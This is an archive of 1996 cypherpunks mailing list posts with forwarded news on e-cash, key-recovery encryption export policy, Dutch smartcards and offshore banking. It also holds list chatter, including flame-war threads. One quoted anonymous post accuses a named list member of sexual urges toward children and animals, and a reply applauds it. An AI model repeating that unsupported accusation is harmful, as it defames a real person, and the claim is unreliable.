Is cybercash safe from hackers and outright criminals? Last fall the Bank of
International Settlements appointed a task force to examine security issues for
E-money products like CyberCoin. The group, headed by Israel Sendrovic, an
executive vice president at the Federal Reserve Bank of New York, reviewed a
raft of upcoming 'smart card' and/or software-based products. Its report,
released early this month, conveys guarded optimism. "These systems are much
more secure than credit cards," says Sendrovic. "There's no single


American Banker: Friday, October 4, 1996

Banks Like Export Plan for High-Power Encryption

By DREW CLARK

Bank technology experts have reacted favorably to the Clinton administration's
proposal to liberalize the development and sale of strong data security tools.

This week, the government said it would lift export restrictions on certain
kinds of cryptography, provided U.S. companies agree to cooperate with a
procedure that would give law enforcement officials access to the "keys" of
such codes, upon presentation of a warrant.

Banks were heartened by the announcement because many view the widely used Data
Encryption Standard -- a low-level form of data scrambling -- as inadequate
protection against the rising computer power of so-called hackers.

Though banks can use a complex 56-bit data encryption key for financial
transactions, sensitive communications with overseas branches are limited to a
less powerful 40-bit standard. Banks hope that a loosening of restrictions in
general will benefit them, too.

"This policy announcement is better than anyone expected," said Kawika M.
Daguio, federal representative at the American Bankers Association in
Washington. "It is gravy for us, but it's the meat and potatoes for the
hardware and software industries."

"Banks probably won't be adversely affected," said Stewart A. Baker, a partner
at Steptoe & Johnson, a Washington law firm, "and they will be left pretty much
where they were before." The announcement by Vice President Al Gore said that
controls over powerful encryption technology would be lifted as the government
and private sector develop a "key recovery" system. (International Business
Machines Corp. already has stepped forward to head a consortium dedicated to
creating such a system.)

Current law forbids the export of computer hardware or software that uses
cryptographic codes with digital "keys" -- randomly generated combinations of
0's and 1's -- longer than 40 bits. The longer the key length, the more
impenetrable the code.

For three years, the government has said it would permit the general use of
more complex cryptography only if the companies using it placed their keys in
the hands of the government or a third party.

"Key escrow," as it is known in the technical community, is needed in order to
prosecute people who have stored evidence of illegal activity on the hard drive
of a computer, officials argued. But the private sector -- banks included --
have balked at handing over such access to any third party.

The disagreement gave rise to a compromise system known as "key recovery" in
which companies would hold their own keys but could be required to divulge
certain information about specific transactions when presented with a court
order or warrant.

"What is novel is that it doesn't escrow any keys," said Homayoon Tajalli,
executive vice president of Trusted Information Systems, Glenwood, Md., one of
IBM's consortium partners.

"If the government comes and gets this data with a court order," explained Mr.
Tajalli, "then they take a digital lockbox from the third party or parties that
hold it, and they read the message."

Kathy Kincaid, director of information technology for IBM, said the difference
between key escrow and key recovery is analogous to the following approach to
securing a house when its owner goes on vacation: Instead of giving a key to
two neighbors, the owner gives each neighbor half the combination to a lockbox
that holds the key.

"You must have both halves and put them together in exactly the right
sequence," said Ms. Kincaid. "This provides protection against a single point
of attack."

Companies participating in development of key recovery systems include: Apple
Computer Inc., Digital Equipment Corp., Groupe Bull, Hewlett-Packard Co., NCR
Corp., RSA Data Security, Sun Microsystems Inc., Trusted Information Systems,
and United Parcel Service.

And a government official said banks may even play a role.

"Banks have really taken a leadership role in the responsible management of
cryptography," said a senior Clinton administration official who asked not to
be named. "Banks are already doing what we want other organizations to do:
safeguarding their keys and providing them, when necessary, to law
enforcement."

Heidi Kukis, a spokeswoman for Vice President Gore, said: "This key recovery
system is the proper balance between commercial interests and national
security."

But not all agree. Some argue that the key recovery system still gives the
government too much control over information flow.

"Providing 56-bit encryption with key recovery doesn't help us," said Netscape
spokeswoman Chris Holton. "The government is saying that you can export it but
you have to provide us with the keys. We feel that is extortion on the part of
the government."

"We are making the best of a bad situation," said Scott Schnell, vice president
of marketing for RSA Data Security.

"The bottom line is that the standard proposed by the government is an
insubstantial step in the right direction," he said. "We want to make sure it
is usable and prepare for the day that products will be available that do not
have this key recovery situation."

The government's announcement came three months after a National Research
Council report on the role of cryptography in an information- oriented society.

The report encouraged liberalization of government standards and questioned the
feasibility of the key escrow system then favored by government.

"We raised the issue about the security of key escrow systems," said law
professor Kenneth W. Dam, chairman of the body that prepared the report, "and
we said the government should work on it."

"I take it this is an attempt to move in the way of key escrow, with the help
of industry," said Mr. Dam.


Reuters: Sunday, October 6, 1996

Dutch Banks to Be First with Smartcards

By Lucas van Grinsven

AMSTERDAM-- Dutch banks are poised to become the first in the world to
introduce computer smartcards on a nationwide scale this year, eventually
giving 15 million people the possibility of living their lives without cash.

Dozens of smartcard trials are being carried out across the globe and industry
pundits forecast billions will be in circulation at the beginning of the next
millennium, but it's the Dutch who lead the field.

Undeterred by union warnings of thousands of job losses in the sector, Dutch
banks will start issuing smartcards to their clients this month and by October
1997 all 15 million people in the Netherlands will have access to them.

The Dutch smartcards are not just reloadable cash cards but can also be used
for on-line bank transfers, retail loyalty schemes such as airmiles,
teleshopping and ticket reservation.

A Dutch consumer can store small amounts of cash on a card which can be used
even for purchases such as icecream or bus fares. The money will be transferred
from the card to the retailer's account without costly on-line links via the
bank.

More expensive articles will ideally be paid on-line, validated by the client's
secret four digit individual code.

Smartcards can be loaded at "cash dispensers," but by the end of 1996 topping
up will also be possible at home via smartphones or cheap "home-loaders"
connected to an ordinary telephone.

"The Netherlands is forerunner. We're the first country to introduce smartcards
on a national scale," said a spokesman for the Dutch "Chipknip" consortium.

There will be two types of Dutch smartcards, issued by two groups of banks,
Rabobank and ABN AMRO on one side with their "Chipknip," and Postbank and PTT
Telecom on the other with the "Chipper."

"Our card has slightly more computer memory which will make payment
transactions more secure," said the Chipknip spokesman.

The Chipper consortium on the other hand claims its card has a multifunctional
character. "It's a services card. You can also use it to book cinema tickets
and then go the theatre where your card is checked at the entrance for
identification. You don't need a physical paper ticket anymore," a Chipper
spokesman said.

Chipknip says such applications will also be possible with their card in the
near future. In a bid to avoid a battle of standards, Chipknip said it planned
to offer all Postbank customers their type of smartcard.

"This country is too small for two different standards," an ABN AMRO spokesman
said. The computer chips on the current generation of smartcards can hold as
much of four densely-typed A4 pages of information, but the industry keeps
expanding capacity in the fight for this potential multi-billion dollar market.

The more information that can be stored on one card, the fewer smartcards
consumers will have to be carried.

Trials in the U.S, such as one carried out in Atlanta at this year's Olympic
Games by Visa, focus on payment transactions.

The Spanish and French governments will launch smartcards on a huge scale next
year to make health care and social security safer and more efficient. People
will carry their medical or social records on a card.

Public transport is another area for smartcards as they reduce ticket sales
time and fare-dodging.

Contactless fare collection is currently pioneered in the South Korean capital,
Seoul, using systems developed by Mikron Indentification, an Austrian company
which was bought by Philips Electronics in 1995 and which also runs pilots in
Sydney.

Smartcards are also used to personalise GSM telephones, computers and
pay-television. Although the first smartcard was developed as early as in 1977
by Motorola and Bull for a bank in France, the home of the smartcard, they are
only now catching on, but without one standard leading the industry.

The choice of an encryption method to ensure safety is still being debated as
is the method for contactless reading.

The battle over smartcard technology and licence fees is being fought between a
few companies, giants such as Motorola, Bull, Philips, Visa and Mastercard but
also LSI, Thomson and specialised France's Gemplus and Britain's Mondex.

But Dutch banks and retailers, who will have to carry most of the
infrastructure costs, will not wait for a single standard despite higher costs
of adapting to different systems at a later stage. The immediate cost
advantages are far too clear.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Tue, 8 Oct 1996 21:47:50 +0800
To: Anonymous <dustman@athensnet.com>
Subject: Re: Dallas Semiconductor turns on Internet commerce at the touch of a button
In-Reply-To: <199610080719.DAA06785@porky.athensnet.com>
Message-ID: <325A331C.794BDF32@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> 
> On Mon, 7 Oct 1996, Robert Hettinga wrote:
> 
> >     iButton users will have universal access to their World Wide Web
>                                                         ^^^^^^^^^^^^^^
> > e-mail at public Internet connections (hotels, airports, kiosks) and
>   ^^^^^^
> 
> I think that says it all.

Someone's not paying attention ...

When WWW browsers are available at hotels and airports, as they surely
will be, then accessing ones email via www will be commonplace.  This
can be called "world wide web e-mail".  And of course you wouldn't want
to carry around a list of s/keys, would you?, so what better way to
authorise the connection than with an iButton?  (Answer: An iButton with
a user interface, perhaps a watch?)

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 9 Oct 1996 09:35:33 +0800
To: cypherpunks@toad.com
Subject: Re: Seeking help on WordPerfect 6.1 cracks [Done, thanks]
In-Reply-To: <199610081850.LAA08871@gulch.spe.com>
Message-ID: <Pine.GUL.3.95.961008125604.17178B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Got it, thanks for the offers of help.

FYI, none of the currently available freeware will decrypt WP 6.1 files; the
WPCRAK mentioned in the sci.crypt FAQ stops at 5.2. But AccessData was kind
enough to decrypt one for free, and the others had the same password.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMlqzB5NcNyVVy0jxAQE6WAH/Wg2NIeaZxdfbRi2tTgdeynMdqXfSm0E6
zhq9aBRdpQEtZSRY5jABH24pLlSd3OfugyhyNqD+qULy4XzIygm5Fw==
=lMjI
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Tue, 8 Oct 1996 21:28:58 +0800
To: cypherpunks@toad.com
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK)
In-Reply-To: <961007.215142.1A1.rnr.w165w@sendai.scytale.com>
Message-ID: <325A3550.15FB7483@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Roy M. Silvernail wrote:
> 
> -----BEGIN PGP MESSAGE-----
> Version: 2.6.2
> 
> owF9Uk1IVFEYVSyKkaGdmyKOYJSkk3+NP1TqjBphI6NmKhl1Z959827euff17n2O
> L3KXCxE3gYsMskWLCFq0sTYSCAUptJIIokUFtqgWBS1aFN3nZFmLPt7i8X3nnu+c
> c+9MyXzZzpKG0ZXU3rfXDy1PbTwrLX15pOxH5diTw6src+9idx4tPaze58uK1PDZ
> C+1v1oa6nq6NjCztupqtWJXLQ90Vs7PPP67L6snmpdpCw/cvrdZC/0r/+IdvNy8u
> zu2ZvvFYN82n2fTM2LXyz7feJ193LKRqjj34tNj7Ij51ZbI8s/q1cm79dE/msnWv
> ZCMxnHi14+7Igbrb98tKM7t13m2IVVVVlZg6JcCZ0rFs4DrUc30xrmpAtGacdLge
> y1NBzVDmUfCYpqotGolGTmB/rEdKC7b0oB3p5xzdBijfdaWicCgsZomDGrUoOAEK
> 0ucWiAjgEc2kIBxMWGyCWT7hRTZbci4LIPAoZzmDCUl+MaNAlNkuRa7dgIsftko7
> RENpoqlRqsEUXE/a0heW2YG89Kg5HqgiznS2+CsRStti+q9CUOVK3/jq7BtFlvhF
> h9vE/WYJNVaGAQ2H20hG+mbuUGHAdDuh0Ssso0kiR4wm2zPxhpAiecFhnEJIHY0o
> P3OJZnWIDOeC5oy8CQpq26at2oG05EyzLCNCwdwSNQaJxXgQHsmblbFopLYW0Qj+
> 1IAMkIphkPEJ6gnC+Gb3HM4Xx54MOlQ20ITT8N6jka6+gSRSTJhXQj2kORXMldqk
> zYgXQNro5BxnHCZyCkkpbF+Z3xoMSlsXiMm/y9hWJtRoJH0yjbSf4SyLXhrANjjz
> 5DxmLu440FiPlji6k0i0oiuB5jg6m3G0CahvRF0C8U7EE0gmUdeK+hYk4n+Z2qyQ
> lEwYRyRjEtyM1fUz4/QfQz8B
> =4wTe
> -----END PGP MESSAGE-----


Try signing your messages in the clear next time, since this sort of
message is a little awkward to read.

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 9 Oct 1996 07:09:03 +0800
To: cypherpunks@toad.com
Subject: NOC_ase
Message-ID: <1.5.4.16.19961008172410.0b77114e@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-8-96. FiTi:

   "Offshore financial centres agree to greater scrutiny."

      The Offshore Group comprises most of the biggest
      offshore financial centres including the Bahamas,
      Bermuda, the Caymans, Gibraltar, the Channel Islands,
      Hong Kong, Lebanon, Panama and Singapore. The agreement
      says home supervisors should be able to inspect the
      books of shell branches wherever they are kept. "In no
      case should access to these books be protected by
      secrecy requirements in the country that licenses the
      shell branch," it says.

   WaJo: "Cold War Spying: Mystery Gives Way to History."

      The release of the Venona documents tells us more about
      the state of intelligence agencies today in both Russia
      and the U.S. than it does about Stalin's spy rings.
      These and counterpart activities in Moscow dramatize the
      ongoing campaign American and Russian intelligence
      agencies are waging in the 1990s -- not against each
      other but at home, to preserve their budgets and public
      respect. And with "Venona: The Book" launched at last
      week's conference, can a CIA/NSA CDROM be far behind?

   -----

   http://jya.com/nocase.txt  (10 kb for 2)

   ftp://jya.com/pub/incoming/nocase.txt

   NOC_ase

----------

Anybody got a copy of the Offshore Group's agreement? Whither EUB?

Or seen "Venona: The Book"? If so, does David Kahn have a part?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Wed, 9 Oct 1996 07:31:35 +0800
To: John Anonymous MacDonald <nobody@cypherpunks.ca>
Subject: Re: A daily warning regarding Dmitri Vulis
In-Reply-To: <199610071608.JAA27152@abraham.cs.berkeley.edu>
Message-ID: <Pine.SUN.3.91.961008133742.18129C-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Oct 1996, John Anonymous MacDonald wrote:

> Dmitri vulis is a liar and fills this list with lies,
> personal attacks and material having nothing to do with
> cryptography.
> He also has unnatural sexual urges towards children,
> animals and other such items.


*Clap, clap, clap, clap, clap* *Whistle*, *Clap, clap, clap, clap, 
clap**Clap, clap, clap, clap, clap**Clap, clap, clap, clap, clap**Clap, 
clap, clap, clap, clap**Clap, clap, clap, clap, clap**Clap, clap, clap, 
clap, clap**Clap, clap, clap, clap, clap* *wistle* *Clap, clap, clap, 
clap, clap**Clap, clap, clap, clap, clap**Clap, clap, clap, clap, clap*

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |  God of pretzles!" |AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Wed, 9 Oct 1996 07:29:03 +0800
To: stewarts@ix.netcom.com
Subject: Re: Recent Web site cracks
Message-ID: <199610081746.NAA09256@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


yes, i heard that about 50 microseconds after i posted.
another thing that i have been thinking is that both of these cracks
were inside jobs, which would explain any number of things.

	-paul

> From stewarts@ix.netcom.com Tue Oct  8 12:36:57 1996
> From: stewarts@ix.netcom.com
> X-Sender: stewarts@popd.ix.netcom.com (Unverified)
> X-Mailer: Windows Eudora Light Version 1.5.2
> Mime-Version: 1.0
> Content-Type> : > text/plain> ; > charset="us-ascii"> 
> Date: Tue, 08 Oct 1996 09:37:23 -0700
> To: pjb@ny.ubs.com
> Original-From: Bill Stewart <stewarts@ix.netcom.com>
> Subject: Re: Recent Web site cracks
> Cc: cypherpunks@toad.com
> Content-Length: 1263
> 
> At 09:46 AM 10/8/96 -0400, pjb@ny.ubs.com wrote:
> >The recent cracks of the DOJ, CIA and Dole web sites have caused me to think 
> >about just what is going on here.
> >
> >Do you suppose that these entries were made via the httpd route, maybe via 
> >cgi-bin, or just a straight telnet-type entry to the server?  I don't know 
> >what operating systems were involved with these three systems, or even if
> 
> The DOJ and CIA sites were actually cracked; don't know the mechanisms.
> The dole-kemp96.com and dole-kemp96.org domains were spoofs - they
> have similar names to the real site, and people reach them by accident
> or by hearing about them.  According to today's San Jose Mercury News,
> the web designer who registered them did so just before Dole announced
> Kemp as his VP, and tried to sell his design services to the campaign.
> They didn't buy it, and the names were sitting around with nothing
> better to do anyway, so he decided to have a good time with them.
> Supposedly he's gotten about 40,000 hits and the "real" site got 1,000,000.
> 
> 
> #			Thanks;  Bill
> # Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
> # You can get PGP outside the US at ftp.ox.ac.uk
>   Imagine if three million people voted for somebody they _knew_,
>   and the politicians had to count them all.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 9 Oct 1996 10:35:59 +0800
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: yellow journalism and Encryption
Message-ID: <199610082059.NAA12207@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:57 AM 10/8/96 -0800, Timothy C. May wrote:
>
>Vinnie may think this is "asswipe journalism," but I think it's one of the
>more interesting and revealing articles we've seen. In fact, it's a pretty
>good summary of the history of wiretaps, the tension between privacy and
>surveillance, and the thinking of those pushing for GAK/Key Recovery.

I too was mystified about his reaction to this article.  We certainly don't 
see articles as appropriate as it every day.


>At 11:12 PM -0700 10/7/96, Vinnie Moscaritolo wrote:
>>http://www.sfgate.com/cgi-bin/examiner/article.cgi?year=1996&month=10&day=
06&ar
>>t
>>Encryption controversy pits life against liberty
>>TOM ABATE
>>EXAMINER COLUMNIST
>...
>>"Wiretapping is the main issue," said Stewart Baker, former general counsel
>>of the National Security Agency, the CIA's code-breaking and eavesdroping
>>cousin.
[snip]

>>Having access to a spare set of code-breaking keys "is not a shift in the
>>balance of power," Vatis said. "It's preserving
>>the status quo."
>
>Clearly these folks are talking as if GAK/Key Recovery is mandated for
>_domestic_ communications.
>
>(I think we'll be seeing some mighty interesting documents and discussions
>coming out as FOIAs are filed. Just as the FOIAs a few years ago showed the
>true thinking behind Clipper: the eventual outlawing of non-Clipper
>alternatives.)

I was happy to see this article describe the case AGAINST wiretapping, using 
exactly the same arguments that I previously stated.  Fortunately, the 
person quoted as pushing them was identified as a lawyer, which (I hope) 
will shut down the naysayers around here.  The way I see it, an excellent 
reason to develop the case against wiretapping is to negate down the 
argument (which this article shows has been used in favor of Clipper) that 
the "status quo" is somehow an acceptable situation.  If we ever get the 
GAK-supporters in some kind of real debate that they can't walk away from, 
the moment they claim that Clipper/GAK is merely "maintaining the status 
quo" we should be prepared to show that the "status quo" was illegitimately 
adopted, modified from an illegal situation pre-1968, and intended (as the 
article indicated) to keep the Democrats in power during a time in which 
they were maintaining the Vietnam war.  

In addition, a lot has come out in the last decade or two about what the US 
Government was up to in the 1960's and before, illegal things, so I'd argue 
that in hindsight that nobody should have embraced wiretapping if they knew 
the circumstances under which it was promoted.  Cointelpro, etc.  Bringing 
up the issue of J. Edgar Hoover in drag might be considered a low blow, but 
who cares about fighting "fair" if nobody knows what "fair" is?

Inform the average citizen of all this, and THEN tell him that the Supreme 
Court is unlikely to want to admit they were wrong to support wiretaps, and 
he'll welcome the news that technology is going to shortly provide him with 
a way to fix this legal problem with a technical solution.  At that point, 
"the status quo" will be looking MIGHTY unacceptable, and we've won the 
argument.  For anybody who wanted to support GAK claiming it was 
"maintaining the status quo," this will be an argument which is essentially 
impossible to defeat, particularly in a debate.





Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Maryanto Tuan dan Puan <lamdn@idola.net.id>
Date: Tue, 8 Oct 1996 17:54:24 +0800
To: cypherpunks@toad.com
Subject: EUB - Pay attention next time guys.
Message-ID: <9610080735.AA07736@merak.idola.net.id>
MIME-Version: 1.0
Content-Type: text/plain


Please unsubscibe lamdn@idola.net.id

Tx


Posted-Date: Mon, 7 Oct 1996 17:08:12 -0400
>Date: Mon, 7 Oct 1996 17:09:35 -0400 (EDT)
>From: Black Unicorn <unicorn@schloss.li>
>X-Sender: unicorn@polaris
>To: John Young <jya@pipeline.com>
>Cc: cypherpunks@toad.com
>Subject: EUB - Pay attention next time guys.
>Sender: owner-cypherpunks@toad.com
>
>On Mon, 7 Oct 1996, John Young wrote:
>
>>    10-7-96. WaPo:
>> 
>>    "Russian Crime Finds Havens In Caribbean"
>> 
>>       Russian organized crime groups are using unregulated and
>>       secretive Caribbean banks to launder their illicit
>>       gains, according to U.S. and Caribbean law enforcement
>>       officials. One bank that has drawn the scrutiny of U.S.
>>       authorities is European Union Bank in Antigua. EUB
>>       describes itself as the first bank on the Internet,
>>       offering the chance to open accounts, wire money, order
>>       credit cards or write checks by computer from anywhere
>>       in the world, 24 hours a day. A U.S. official said, "The
>>       bank is being investigated for violating U.S. laws with
>>       open solicitations on the Net, which is at best for tax
>>       evasion and at worst for money laundering."
>> 
>
>Of course I'm very interested to hear exactly what laws have been broken
>in this case.  Last I checked offering accounts, credit cards, and checks
>24 hours a day was a selling point, not a crime.  This hardly surprises me
>however.  The money laundering and tax evasion rhetoric is dragged out
>whenever there is no tangible crime being committed.
>
>EUB is probably in more trouble than they realize because they chose an
>interesting solution to their bandwidth problem. 
>
>For a long time their home page resolved to a U.S. access provider, and
>only forwarded offshore for the secure HTTP connection.  This might still
>be the case.
>
>See below:
>
>European Union Bank (EUB-DOM)
>   PO Box 1948
>   St. John's,
>   Antigua and Barbuda
>
>   Domain Name: EUB.COM
>
>   Administrative Contact:
>      Richards, Pete  (PR374)  75057.2515@COMPUSERVE.COM
>      (809) 480-2370
>   Technical Contact, Zone Contact, Billing Contact:
>      Kulkov, Val  (VK41)  val@GREATIS.COM
>      (202) 835-7489
>
>   Record last updated on 03-Dec-95.
>   Record created on 23-Jun-95.
>
>   Domain servers in listed order:
>
>   ELF.GREATIS.COM              205.229.28.5
>   WHALE.GREATIS.COM            205.229.28.10
>
>
>I found this curious and called them up to ask them about it.  I think,
>though I don't remember exactly, that I spoke with Mr. Richards.  Whoever
>it was, they were very sure that their U.S. connection would not be a
>problem.  I think they are about to be in for a great big surprise.  They
>have effectively put themselves in U.S. jurisdiction and their local
>access provider is likely to be in some trouble as it is the easiest thing
>to reach.
>
>Prediction: EUB will change its structure dramatically in the next 6
>months if it still exists at all in that time.  Lesson learned: Never
>involve the United States directly.  Clever political risk analysis would
>have prevented a great deal of trouble for EUB.  Future institutions take
>note.
>
>--
>I hate lightning - finger for public key - Vote Monarchist
>unicorn@schloss.li
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Wed, 9 Oct 1996 09:04:35 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Did Jesus masturbate ?
In-Reply-To: <BemgVD26w165w@bwalk.dm.com>
Message-ID: <Pine.OSF.3.91.961008143507.30317A-100000@beall.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Wipe the drool off your face and read the previous post!

Dan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 9 Oct 1996 09:15:26 +0800
To: Stephen Humble <deeb@x.org>
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK)
In-Reply-To: <9610081444.AA23161@hydra.cde.x.org>
Message-ID: <Pine.BSF.3.91.961008150238.7141D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 8 Oct 1996, Stephen Humble wrote:

> attila <attila@primenet.com> sez:
> > why would any rational individual espouse ANY cause he thought was
> > wrong!
> 

Perhaps he wishes to marry Anne Bolyn ...

Perhaps he/she is not religious at all, but finds the need to follow the 
herd for social, political, or business reasons ...

Can we kill this inane thread?

-r.w.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ROCK.CNB.UAM.ES
Date: Wed, 9 Oct 1996 01:45:45 +0800
To: rp@rpini.com
Subject: RE: crypto cd once more
Message-ID: <961008152334.20601645@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


>1) is there a system that can handle unix, windows and mac filenames
>
	Yes. Use Rock Ridge extensions. That will allow for long UNIX
names. If you couple it with ISO9660 youget both worlds.

	Caveats: Macs don't accept RR. Hell!

	Solution: Use level 2 (32+32) names.

	Problem: that's OK for VMS and perhaps Macs, but not for PC's.

	Solution: Use level 1 (8+3) ISO.

	That's easily done with the tools for Liux/Unix. I used them when
I created my personal Crypto-CD a year ago. You tell the program to use
Rock Ridge and convert all names to 8+3. That gives you a double directory
hierarchy, one that's compatible with everything (8+3) plus one that
allows long names (RR).

	If only Macs supported RR...

ObCrypto:

	Have you considered the possibility of filling the unused portion of
the disk with random noise from a good source? Some people could find it useful
even if it is only for trial/test purposes.

	And, is there any possibility of making an international version of
it?

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 9 Oct 1996 09:27:20 +0800
To: cypherpunks@toad.com
Subject: Government Denial of Service Attacks
Message-ID: <3.0b19.32.19961008154059.00a26358@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Those who read this list or watch the news of the "Wired Curtain" that is
attempting to be drawn across the Net know that there is a theory out there
that government Denial of Service Attacks (GDOS) are a real threat.  The
GDOS theory holds that if government legislates or even threatens
litigation against the provision of a particular service, the providers of
the service will fold and the public will be unable to obtain the banned
service.

In the case of the net this is the "Do Not <--'Enter" theory.  The
governments claim that by threat, deception, or nuclear weapons, they can
keep millions of us from hitting the <--'Enter key and thus transmitting
banned material.  That is a very fine control regime indeed.  (Original
meaning of 'fine' of course.)

If the governments had this GDOS power; this Do Not <--'Enter power, then
the article on the front page of today's New York Times could not have been
written.

"Behind a Suburban Facade in Queens, A Teeming, Angry Urban Arithmetic" is
the annual NYT article on the spread of illegal apartments throughout the
Region.  From the humblest urban ghetto to the swankiest suburbs, denizens
of the TriState area are converting one- and two-family dwellings into two-
three- or four-family (and denser) dwellings.  These illegal apartments are
commonplace and illegal.  This has been true (and written about) for years.
 Here we have a physical service (apartment rental), difficult to hide, and
illegal which is offered by hundreds of thousands of property owners in
this area.

The GDOS theory holds that this can't happen.  "All they have to do is pass
a law."  Note that the GDOS theories that involve our activities say that
once the government passes a law, no one (or hardly anyone) will offer an
anonymous Net account, or an uncensored ISP connection, or an un IDed
financial account, or an uncensored news server, etc.  That all government
has to do is pass a law and all transactions will be carried out in rigid
conformity to its dictates.  

I say nonsense.  If the government can't keep thousands of property owners
(with their physical property at risk) from offering it for rent illegally,
in an "open, notorious, and continuous" manner; then they aren't going to
be able to keep very many of us from hitting <--'Enter.

DCF

"During Fiscal 1996, the Government of the United States collected more
taxes from the American people than any government had ever collected
before in the history of mankind.  During Fiscal 1997, the Government of
the United States plans to collect more taxes from the American people than
any government has ever collected before in the history of mankind.  And
still it's not enough."      




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craigw@dg.ce.com.au
Date: Tue, 8 Oct 1996 16:02:06 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK)
Message-ID: <199610080542.PAA00751@mac.ce.com.au>
MIME-Version: 1.0
Content-Type: text/plain



> >         that statement is profound in more ways that in religion!  why
> >     would any rational individual espouse ANY cause he thought was
> >     wrong!
> 
>      For the money.
> 
for sex, prestige, because no matter how rational most of us have 
times we do not think first....

The list is endless

Craig

        ,'~``.              \|/              ,'``~.
        (-o=o-)            (@ @)            ,(-o=o-),
+--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+
|                                                              |
|   Soon, we may all be staring at our computers, wondering    |
|               whether they're staring back.                  |
|                                                              |
| [Network Admin For WPA Business Products.  aka doshai >;-) ] |
|    .oooO        http://pip.com.au/~doshai/      Oooo.        |
|    (   )   Oooo.                        .oooO   (   )        |
+-----\ (----(   )-------oooO-Oooo--------(   )--- ) /---------+
       \_)    ) /                          \ (    (_/
             (_/                            \_)
Key fingerprint = 2D F4 54 BB B4 EA F1 E7  B6 DE 48 92 FC 8D FF 49
Send a message with the subject "send pgp-key" for a copy of my key.
(if I want to give it to you)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Donald Weightman <dweightman@radix.net>
Date: Wed, 9 Oct 1996 09:35:50 +0800
To: cypherpunks@toad.com
Subject: Be careful where you put up
Message-ID: <199610081944.PAA02763@news1.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


Apropos the thread about asset allocation and relocation to hedge political
risk, today's FINANCIAL TIMES reports:

>Offshore banking centres agree to greater scrutiny
>
>                   Tuesday October 8 1996
>
>                   By George Graham, Banking Correspondent
>
>                   Banking supervisors from large offshore financial
centres have agreed to
>                   co-operate more with their counterparts in
industrialised nations in
>                   investigating irregular behaviour at banks under their
control.

<SNIP>


>                   The drafting involved hard negotiations on issues such
as when a
>                   supervisor could ask for the identity of an individual
depositor or investor.
>                   A supervisor in Europe may, for example, want to know
that a bank is not
>                   dependent for all its deposits on one source, but the
offshore centre does
>                   not want that to serve as an excuse for trawling for tax
evaders.
>
>                   In all 140 countries have endorsed the deal, which sets
out procedures for
>                   exchanging information between supervisors and also
establishes a
>                   checklist to ensure that banking operations in a
particular country are
>                   subject to effective supervision.
>
>                   The agreement says home supervisors should be able to
